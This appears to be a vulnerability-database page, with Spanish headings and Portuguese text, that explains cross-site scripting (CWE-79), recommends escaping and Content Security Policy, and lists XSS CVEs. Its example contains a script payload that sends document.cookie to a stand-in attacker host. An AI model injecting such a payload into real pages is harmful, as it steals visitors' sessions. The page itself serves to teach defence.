Fallos del tipo CWE-79

29.035 resultados

Injeção de Script entre Sites (XSS)

Ocorre quando uma aplicação web insere dados não validados ou não escapados diretamente em páginas HTML, permitindo que um atacante injete código JavaScript malicioso. Esse script é executado no navegador da vítima, roubando cookies, tokens de autenticação ou realizando ações em nome do usuário.

Ejemplo

Um site de comentários que exibe a entrada do usuário sem sanitização: se alguém escreve <script>fetch('http://atacante.com/?cookie='+document.cookie)</script> como comentário, o navegador de quem visualiza executa o script e envia seus cookies para o atacante.

Cómo mitigar

Sempre escapar (ou codificar em HTML) dados vindos do usuário antes de renderizar: use funções como htmlspecialchars() em PHP, textContent ao invés de innerHTML em JavaScript, ou use templates que escapam por padrão (como Jinja2, Vue com v-text). Implemente Content Security Policy (CSP) como camada adicional de defesa.

CVE-2025-1987CRITICALStored XSS in Psono-Client via Malicious Vault Entry URLsEPSS 0.6%CVE-2026-31809MEDIUMSiYuan has a SVG Sanitizer Bypass via Whitespace in `javascript:` URI — Unauthenticated XSSEPSS 0.6%CVE-2012-10003LOWahmyi RivetTracker cross site scriptingEPSS 0.6%CVE-2022-2695MEDIUMBeaver Builder – WordPress Page Builder <= 2.5.5.2 - Authenticated Stored Cross-Site Scripting via 'caption'EPSS 0.6%CVE-2022-25604MEDIUMWordPress Price Table plugin <= 0.2.2 - Authenticated Stored Cross-Site Scripting (XSS) vulnerabilityEPSS 0.6%CVE-2023-22911MEDIUMAn issue was discovered in MediaWiki before 1.35.9, 1.36.x through 1.38.x before 1.38.5, and 1.39.x before 1.39.1. E-Widgets does widget repEPSS 0.6%CVE-2022-27656—The Web administration UI of SAP Web Dispatcher and the Internet Communication Manager (ICM) does not sufficiently encode user-controlled inEPSS 0.6%CVE-2024-8521MEDIUMWavelog Live QSO qso index cross site scriptingEPSS 0.6%CVE-2022-38186HIGHThere is a reflected XSS vulnerability in Esri Portal for ArcGIS versions 10.8.1 and below which may allow a remote attacker able to convincEPSS 0.6%CVE-2026-15091CRITICALMultiple Vulnerabilities in IBM Engineering AI hub.EPSS 0.6%CVE-2021-27788HIGHHCL Verse is susceptible to a Cross Site Scripting (XSS) vulnerabilityEPSS 0.6%CVE-2022-37306MEDIUMOX App Suite before 7.10.6-rev30 allows XSS via an upsell trigger.EPSS 0.6%CVE-2026-27099HIGHJenkins 2.483 through 2.550 (both inclusive), LTS 2.492.1 through 2.541.1 (both inclusive) does not escape the user-provided description of EPSS 0.6%CVE-2022-38188HIGHThere is a reflected XSS vulnerability in Esri Portal for ArcGIS versions 10.9.1 which may allow a remote attacker able to convince a user tEPSS 0.6%CVE-2022-38073MEDIUMWordPress Awesome Support plugin <= 6.0.7 - Multiple Authenticated Persistent XSS (Additional Interested Parties)EPSS 0.6%CVE-2023-46735MEDIUMSymfony potential Cross-site Scripting in WebhookControllerEPSS 0.6%CVE-2023-37905MEDIUMCross-site Scripting (XSS) in Source Mode of Editor in ckeditor-wordcount-pluginEPSS 0.6%CVE-2023-43509MEDIUMUnauthenticated Endpoint Allows Sending Arbitrary OnGuard NotificationsEPSS 0.6%CVE-2023-45360MEDIUMAn issue was discovered in MediaWiki before 1.35.12, 1.36.x through 1.39.x before 1.39.5, and 1.40.x before 1.40.1. There is XSS in youhavenEPSS 0.6%CVE-2024-2720LOWCampcodes Complete Online DJ Booking System aboutus.php cross site scriptingEPSS 0.6%